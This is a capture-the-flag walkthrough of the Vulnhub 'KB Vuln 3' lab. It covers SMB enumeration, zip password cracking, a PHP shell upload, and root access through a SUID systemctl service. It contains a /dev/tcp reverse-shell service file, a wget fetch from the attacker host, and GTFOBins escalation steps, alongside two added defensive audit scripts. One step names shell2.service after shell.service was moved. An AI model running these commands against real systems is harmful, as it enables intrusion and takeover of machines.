KB Vuln 3
Author: jason huawen
Identifying the target host's IP address
```text
┌──(kali㉿kali)-[~/Vulnhub/KBVuln3]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
 Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:06      1      60  Unknown vendor
 192.168.56.100  08:00:27:69:ef:ae      1      60  PCS Systemtechnik GmbH
 192.168.56.254  08:00:27:38:ea:a0      1      60  PCS Systemtechnik GmbH
```
Using Kali Linux's netdiscover tool, the target host's IP address is identified as 192.168.56.254.
Nmap scan
```text
┌──(kali㉿kali)-[~/Vulnhub/KBVuln3]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-11 19:35 EDT
Nmap scan report for bogon (192.168.56.254)
Host is up (0.00042s latency).
Not shown: 65531 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 cb04f0363f42f73ace2ff54ce0abfe17 (RSA)
|   256 6106df25d5e1e347fe1394fd740c8500 (ECDSA)
|_  256 5089b6b43a0b6e63121040e2c4f93533 (ED25519)
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
MAC Address: 08:00:27:38:EA:A0 (Oracle VirtualBox virtual NIC)
Service Info: Host: KB-SERVER; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: KB-SERVER, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb2-time:
|   date: 2023-04-11T23:35:58
|_  start_date: N/A
| smb2-security-mode:
|   311:
|_    Message signing enabled but not required
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: kb-server
|   NetBIOS computer name: KB-SERVER\x00
|   Domain name: \x00
|   FQDN: kb-server
|_  System time: 2023-04-11T23:35:58+00:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.75 seconds
```
The Nmap scan shows that the target host has four open ports: 22 (SSH), 80 (HTTP), and 139/445 (Samba).
Getting a shell
```text
┌──(kali㉿kali)-[~/Vulnhub/KBVuln3]
└─$ smbclient -L 192.168.56.254
Password for [WORKGROUP\kali]:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        Files           Disk      HACK ME
        IPC$            IPC       IPC Service (Samba 4.7.6-Ubuntu)
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            KB-SERVER

┌──(kali㉿kali)-[~/Vulnhub/KBVuln3]
└─$ smbclient //192.168.56.254/Files
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Oct  2 14:11:49 2020
  ..                                  D        0  Fri Oct  2 13:12:00 2020
  website.zip                         N 38936127  Fri Oct  2 14:11:41 2020

                14380040 blocks of size 1024. 9540188 blocks available
smb: \> get website.zip
getting file \website.zip of size 38936127 as website.zip (121094.1 KiloBytes/sec) (average 121094.1 KiloBytes/sec)
smb: \> pwd
Current directory is \\192.168.56.254\Files\
smb: \> cd /var
cd \var\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \> quit
```
Connect to the target's SMB service with smbclient and download the file from the shared directory to Kali Linux.

```text
┌──(kali㉿kali)-[~/Vulnhub/KBVuln3]
└─$ enum4linux 192.168.56.254
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''

S-1-22-1-1000 Unix User\heisenberg (Local User)
```
enum4linux identifies that the user heisenberg exists on the target host.
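Two Samba settings make the enumeration above possible: the share is readable by anonymous (guest) sessions, and the Nmap output reports that message signing is enabled but not required. The following Python script is an added example (not part of the original write-up and not the box's real configuration) that audits an smb.conf for exactly those settings; both smb.conf texts are constructed here, the first to mirror what the enumeration implies, the second as a hardened version.

```python
"""Audit an smb.conf for anonymous share access and non-mandatory signing.

Added example for this write-up; the configurations below are constructed,
not taken from the target machine.
"""
import configparser

# Constructed sample: Ubuntu's packaged default 'map to guest = Bad User' plus a
# guest-readable share, matching the anonymous listing seen with smbclient -L.
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = KB-SERVER
   map to guest = Bad User
   server signing = auto

[Files]
   comment = HACK ME
   path = /srv/samba/files
   guest ok = yes
   read only = yes
"""

# Constructed hardened counterpart: no guest mapping, signing required,
# share restricted to a named user.
HARDENED_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   map to guest = never
   server signing = mandatory
   restrict anonymous = 2

[Files]
   path = /srv/samba/files
   guest ok = no
   valid users = heisenberg
   read only = yes
"""


def parse_smb_conf(text):
    """smb.conf is INI-like: keys are case-insensitive and may repeat, so we
    lowercase them (configparser's default) and tolerate duplicates."""
    cp = configparser.ConfigParser(strict=False, interpolation=None,
                                   inline_comment_prefixes=("#", ";"))
    cp.read_string(text)
    return cp


def _truthy(value):
    return value.strip().lower() in ("yes", "true", "1")


def audit_smb_conf(text):
    """Return a list of (section, finding) tuples for weak settings."""
    cp = parse_smb_conf(text)
    findings = []
    glob = cp["global"] if cp.has_section("global") else {}
    # 'map to guest' other than 'never' turns failed logins into guest
    # sessions, which is what lets an empty password list the shares.
    if glob.get("map to guest", "never").strip().lower() != "never":
        findings.append(("global", "map to guest is not 'never'"))
    # Signing must be 'mandatory' for the server to reject unsigned sessions.
    if glob.get("server signing", "default").strip().lower() != "mandatory":
        findings.append(("global", "server signing is not 'mandatory'"))
    for section in cp.sections():
        if section.lower() in ("global", "printers", "print$"):
            continue
        sec = cp[section]
        # 'guest ok' and its synonym 'public' allow anonymous access to a share.
        if _truthy(sec.get("guest ok", "no")) or _truthy(sec.get("public", "no")):
            findings.append((section, "share allows guest (anonymous) access"))
        # 'read only' defaults to yes; 'writable' is its inverse synonym.
        if not _truthy(sec.get("read only", "yes")) or _truthy(sec.get("writable", "no")):
            findings.append((section, "share is writable"))
    return findings


if __name__ == "__main__":
    for label, conf in (("sample", SAMPLE_SMB_CONF), ("hardened", HARDENED_SMB_CONF)):
        print(label, audit_smb_conf(conf) or "no findings")
```

On a live host the same function can be pointed at the contents of /etc/samba/smb.conf; the guest finding for the share and the two global findings are what a reviewer would expect to see for a box that answers `smbclient -L` without credentials.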
```text
┌──(kali㉿kali)-[~/Vulnhub/KBVuln3]
└─$ ls -alh
total 38M
drwxr-xr-x  2 kali kali 4.0K Apr 11 19:38 .
drwxr-xr-x 89 kali kali 4.0K Apr 11 19:34 ..
-rw-r--r--  1 root root 1.8K Apr 11 19:35 nmap_full_scan
-rw-r--r--  1 kali kali  38M Apr 11 19:38 website.zip

┌──(kali㉿kali)-[~/Vulnhub/KBVuln3]
└─$ unzip website.zip
Archive:  website.zip
[website.zip] README.txt password:
```
website.zip is password-protected. It can be converted to a hash with zip2john and then cracked with John the Ripper.

```text
┌──(kali㉿kali)-[~/Vulnhub/KBVuln3]
└─$ zip2john website.zip > hashes
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes --force
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
porchman         (website.zip)
1g 0:00:00:00 DONE (2023-04-11 19:40) 1.886g/s 8617Kp/s 8617Kc/s 8617KC/s porno852..poppy670
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```

```text
┌──(kali㉿kali)-[~/Vulnhub/KBVuln3]
└─$ cat README.txt
Hi Heisenberg! Your website is activated. --> kb.vuln
Username : admin
Password : jesse
Have a good day !
```
These are probably the website's username and password; set them aside for now.

```text
┌──(kali㉿kali)-[~/Vulnhub/KBVuln3/sitemagic]
└─$ nikto -h http://192.168.56.254
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.254
+ Target Hostname:    192.168.56.254
+ Target Port:        80
+ Start Time:         2023-04-11 19:44:48 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 2240, size: 5b0b40b8dd680, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: HEAD, GET, POST, OPTIONS
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2023-04-11 19:45:44 (GMT-4) (56 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
```
Given the README.txt file, should kb.vuln be added to /etc/hosts?

```text
┌──(kali㉿kali)-[~/Vulnhub/KBVuln3/sitemagic]
└─$ sudo vim /etc/hosts

┌──(kali㉿kali)-[~/Vulnhub/KBVuln3/sitemagic]
└─$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
192.168.56.254  kb.vuln
```
After refreshing the page it no longer returns "page not found" and now shows a Login link. Logging in with the username and password from README.txt succeeds. The next goal is to upload shell.php; uploads are not restricted in any way, but where does the uploaded file end up?
From the page source:

```html
<div><img title="/Sunrise2/People.jpg" src="https://www.cnblogs.com/files/images/Sunrise2/People.jpg" alt="/Sunrise2/People.jpg" width="545" height="270">
```
the file location can be guessed: upload shell.php into the images/backgrounds directory, and it is reachable at
http://kb.vuln/files/images/backgrounds/shell.php

```text
┌──(kali㉿kali)-[~/Vulnhub/KBVuln3/sitemagic]
└─$ sudo nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 38966
Linux kb-server 4.15.0-118-generic #119-Ubuntu SMP Tue Sep 8 12:30:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 00:04:41 up 34 min,  0 users,  load average: 0.86, 0.42, 0.55
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@kb-server:/$ cd /home
cd /home
www-data@kb-server:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x  3 root       root       4.0K Oct  2  2020 .
drwxr-xr-x 24 root       root       4.0K Oct  2  2020 ..
drwxr-xr-x  4 heisenberg heisenberg 4.0K Oct  2  2020 heisenberg
www-data@kb-server:/home$ cd heisengerg
cd heisengerg
bash: cd: heisengerg: No such file or directory
www-data@kb-server:/home$ cd heisenberg
cd heisenberg
www-data@kb-server:/home/heisenberg$ ls -alh
ls -alh
total 32K
drwxr-xr-x 4 heisenberg heisenberg 4.0K Oct  2  2020 .
drwxr-xr-x 3 root       root       4.0K Oct  2  2020 ..
-rw-r--r-- 1 heisenberg heisenberg  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 heisenberg heisenberg 3.7K Apr  4  2018 .bashrc
drwx------ 2 heisenberg heisenberg 4.0K Oct  2  2020 .cache
drwx------ 3 heisenberg heisenberg 4.0K Oct  2  2020 .gnupg
-rw-r--r-- 1 heisenberg heisenberg  807 Apr  4  2018 .profile
-rw-r--r-- 1 heisenberg heisenberg    0 Oct  2  2020 .sudo_as_admin_successful
-rw-r--r-- 1 root       root         33 Oct  2  2020 user.txt
www-data@kb-server:/home/heisenberg$ cat user.txt
cat user.txt
6346c6d19751f1a3195f1e4b4b609544
www-data@kb-server:/home/heisenberg$
```
This yields the user flag.
Privilege escalation
```text
www-data@kb-server:/var/www/html/sitemagic$ find / -perm -4000 -type f 2>/dev/null
<l/sitemagic$ find / -perm -4000 -type f 2>/dev/null
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/at
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/newgidmap
/usr/bin/passwd
/usr/bin/traceroute6.iputils
/bin/systemctl
/bin/umount
/bin/su
/bin/mount
/bin/fusermount
/bin/ping
```
The SUID bit on systemctl can be used for privilege escalation; the reference steps from the GTFOBins site are:

```sh
sudo install -m =xs $(which systemctl) .

TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "id > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
./systemctl link $TF
./systemctl enable --now $TF
```
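From the defender's side, this path has two observable pieces: a binary carrying a SUID bit that a stock install does not grant it (/bin/systemctl is the odd one out in the list above), and the symlink that `systemctl link` leaves in /etc/systemd/system pointing at a unit file stored outside the normal unit directories. The Python script below is an added example, not code from the write-up or from GTFOBins, that checks both. The baseline set is an assumption: it is the page's own `find` output with /bin/systemctl removed, taken as the stock Ubuntu 18.04 SUID set; the directory tree used for the unit-link demo is constructed in a temporary directory.

```python
"""Detect SUID drift and foreign systemd unit symlinks.

Added example for this write-up. SUID_BASELINE is assumed (the page's find
output minus /bin/systemctl); the demo tree is constructed, not a real host.
"""
import os
import stat
import tempfile

# Assumed stock-Ubuntu 18.04 SUID set: the write-up's find output without
# /bin/systemctl, which is not SUID on a default install.
SUID_BASELINE = frozenset({
    "/usr/lib/snapd/snap-confine", "/usr/lib/policykit-1/polkit-agent-helper-1",
    "/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic", "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/bin/at", "/usr/bin/sudo", "/usr/bin/newgrp", "/usr/bin/newuidmap",
    "/usr/bin/chfn", "/usr/bin/pkexec", "/usr/bin/gpasswd", "/usr/bin/chsh",
    "/usr/bin/newgidmap", "/usr/bin/passwd", "/usr/bin/traceroute6.iputils",
    "/bin/umount", "/bin/su", "/bin/mount", "/bin/fusermount", "/bin/ping",
})

# Constructed sample input: the list the find command printed on the box.
FOUND_ON_BOX = sorted(SUID_BASELINE | {"/bin/systemctl"})


def suid_drift(found_paths, baseline=SUID_BASELINE):
    """SUID binaries present on the host but absent from the baseline."""
    return sorted(set(found_paths) - set(baseline))


def scan_suid(root="/"):
    """Live equivalent of 'find / -perm -4000 -type f', for feeding suid_drift()."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return hits


TRUSTED_UNIT_DIRS = ("/etc/systemd/system", "/lib/systemd/system",
                     "/usr/lib/systemd/system", "/run/systemd/system")


def foreign_unit_links(unit_dir="/etc/systemd/system", trusted=TRUSTED_UNIT_DIRS):
    """'systemctl link' leaves a symlink in unit_dir pointing at the linked file.
    Return (link, resolved_target) for every symlink under unit_dir whose target
    resolves outside the trusted unit directories, e.g. into a web root or /tmp.
    Symlinks in *.wants/ subdirectories are covered because os.walk recurses."""
    prefixes = tuple(d.rstrip("/") + "/" for d in trusted)
    foreign = []
    for dirpath, _dirs, files in os.walk(unit_dir):
        for name in files:
            link = os.path.join(dirpath, name)
            if not os.path.islink(link):
                continue
            target = os.path.realpath(link)
            if not target.startswith(prefixes):
                foreign.append((link, target))
    return foreign


def build_demo_tree():
    """Constructed directory tree mimicking the box after 'systemctl link' was run
    against a unit stored under the web root. Returns (unit_dir, trusted_dirs)."""
    root = os.path.realpath(tempfile.mkdtemp(prefix="unit-audit-"))
    unit_dir = os.path.join(root, "etc/systemd/system")
    vendor_dir = os.path.join(root, "lib/systemd/system")
    web_dir = os.path.join(root, "var/www/html/sitemagic")
    for d in (unit_dir, vendor_dir, web_dir):
        os.makedirs(d)
    vendor_unit = os.path.join(vendor_dir, "ssh.service")
    web_unit = os.path.join(web_dir, "shell.service")
    for path in (vendor_unit, web_unit):
        with open(path, "w") as fh:
            fh.write("[Service]\nType=oneshot\n")
    os.symlink(vendor_unit, os.path.join(unit_dir, "ssh.service"))  # legitimate
    os.symlink(web_unit, os.path.join(unit_dir, "shell.service"))   # foreign
    return unit_dir, (unit_dir, vendor_dir)


if __name__ == "__main__":
    print("SUID drift:", suid_drift(FOUND_ON_BOX))
    unit_dir, trusted = build_demo_tree()
    for link, target in foreign_unit_links(unit_dir, trusted):
        print(f"foreign unit link: {link} -> {target}")
```

On a real host, `suid_drift(scan_suid())` and `foreign_unit_links()` with their defaults give the two checks; the remediation for the first finding is removing the bit (`chmod u-s /bin/systemctl`), and for the second, `systemctl disable` of the unit and deleting the link.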
So next, write a service file that spawns a new reverse shell:

```text
┌──(kali㉿kali)-[~/Vulnhub/KBVuln3]
└─$ cat shell.service
[Service]
Type=oneshot
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/192.168.56.206/6666 0>&1'
[Install]
WantedBy=multi-user.target
```
Upload shell.service to the target's /tmp directory:

```text
www-data@kb-server:/tmp$ wget http://192.168.56.206:8000/shell.service
wget http://192.168.56.206:8000/shell.service
--2023-04-12 00:31:31--  http://192.168.56.206:8000/shell.service
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 132 [application/octet-stream]
Saving to: 'shell.service'

shell.service       100%[===================>]     132  --.-KB/s    in 0s

2023-04-12 00:31:31 (46.4 MB/s) - 'shell.service' saved [132/132]
```
Move shell.service into the web directory:

```text
www-data@kb-server:/var/www/html/sitemagic$ mv /tmp/shell.service .
mv /tmp/shell.service .
```
Then create the service:

```text
www-data@kb-server:/var/www/html/sitemagic$ systemctl link /var/www/html/sitemagic/shell2.service
```
Start the service:

```text
www-data@kb-server:/var/www/html/sitemagic$ systemctl start shell2.service
```